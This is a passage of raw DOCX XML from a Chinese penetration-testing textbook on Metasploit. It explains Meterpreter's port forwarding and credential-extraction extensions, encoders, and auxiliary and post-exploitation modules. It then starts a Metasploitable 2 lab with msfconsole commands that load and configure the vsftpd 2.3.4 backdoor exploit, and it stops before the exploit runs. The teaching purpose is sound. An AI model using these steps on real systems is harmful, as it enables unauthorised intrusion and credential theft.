        <w:t xml:space="preserve">协议加密所有通信，有效规避基于明文内容的网络入侵检测系统（NIDS）检测①。同时，它内置了强大的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（端口转发）和网络路由（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）功能，为后续的“内网枢轴攻击”（详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）提供了无缝的技术底座。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动态扩展体系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令，可以在已建立的会话中动态加载如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stdapi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API，提供文件系统、网络、进程操作）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">priv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（提权辅助）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（凭据提取）等扩展。这些扩展同样运行在内存中，实现了攻击能力的模块化，即“得到的不仅是一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell，而是一个可动态扩展的远程控制平台”②。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="301"/>
    <w:bookmarkStart w:id="302" w:name="encoder-模块编码器模块"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（编码器模块）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">职责与边界</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：编码器的设计初衷是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解决“坏字符（Bad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Character）”问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。许多漏洞利用过程中，某些十六进制字节（如空字节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、换行符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）会截断输入或导致协议解析错误。Encoder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Xor、Shikata Ga Nai </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等算法，将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转换成不含这些坏字符的形态，并在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前附加一段解码存根（Decoder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stub），以在运行时恢复原</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">武器化红线预警</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本书在此必须强调一个关键伦理与技术红线</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。Encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在历史上和公众认知中常与“免杀”联系在一起。我们明确声明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本节仅讨论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解决坏字符的原始功能③。本书不教授如何利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">或其它技术进行反病毒软件（AV）或端点检测与响应系统（EDR）的规避（Bypass）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">那些技术属于持续对抗的隐蔽性武器化范畴，超出了授权测试教学的范围。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="302"/>
    <w:bookmarkStart w:id="303" w:name="auxiliary-模块辅助模块"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Auxiliary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（辅助模块）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">职责</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：执行不属于漏洞利用的各类支撑性、探测性操作。这包括但不限于：网络服务扫描（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">scanner/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、登录爆破（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">login/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、拒绝服务测试（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dos/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、特定服务信息刺探（如提取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Git </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仓库、SMB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">共享枚举）等。它们是攻击前置或后渗透的补充工具集。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="303"/>
    <w:bookmarkStart w:id="304" w:name="post-模块后渗透模块"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（后渗透模块）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">职责</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在当前已获得的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或其他类型会话上运行，执行本地信息收集、提权、凭据窃取、持久化等后渗透任务（详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。这些模块本质上是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">动态扩展的脚本化封装，便于攻击流程的自动化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【交叉回指框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本小节描述的“漏洞发现”阶段，对应第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap/NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描实践的结果输入；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">背后的内存破坏原理，是第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章栈溢出、shellcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ret2libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">思想的直接应用；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stager/Stageless </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行与进程操作”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，依赖第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节讨论的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NX/ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等缓解机制的存在前提；而本章最终获得的低权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话，正是第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权和第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows/AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权的起点。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="304"/>
    <w:bookmarkEnd w:id="305"/>
    <w:bookmarkStart w:id="306" w:name="靶机实操在-metasploitable-上实践模块化攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上实践模块化攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本单元的目的是在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一经典授权靶机上，完整演示从启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到获得会话的标准流程，使读者深刻理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节所述模块在实践中的组合方式。所有命令和路径占位符均使用真实工具语法，但结果因靶机版本和网络环境而异②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击机（Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux）IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ATTACKER_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。两者处于同一隔离虚拟网络。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1：启动框架与搜索模块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在攻击机终端启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">控制台，然后根据已知信息（通过第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章扫描或预习得到）搜索对应模块。此例中我们瞄准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上经典的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：搜索结果列表中将显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块，其等级（Rank）等元数据。这表明该模块是该漏洞的绝佳匹配。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">此模块的存在与否和精确路径，取决于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit Framework </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的发布版本，为环境相关特征②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2：加载与配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用模块的全路径加载它，然后查看并设置必选项。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
